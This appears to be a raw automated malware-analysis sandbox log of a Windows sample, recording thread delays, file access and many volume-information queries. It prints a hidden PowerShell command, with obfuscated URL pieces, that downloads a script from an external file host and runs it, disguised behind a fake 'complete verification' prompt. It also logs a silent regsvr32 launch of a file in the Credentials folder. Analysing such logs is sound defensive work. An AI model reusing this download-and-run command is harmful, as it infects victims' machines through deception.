Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7716
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2122

Source: C:\Windows\System32\svchost.exe TID: 6452	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484	Thread sleep count: 7716 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484	Thread sleep count: 2122 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676	Thread sleep time: -4611686018427385s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12

Language, Device and Operating System Detection

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
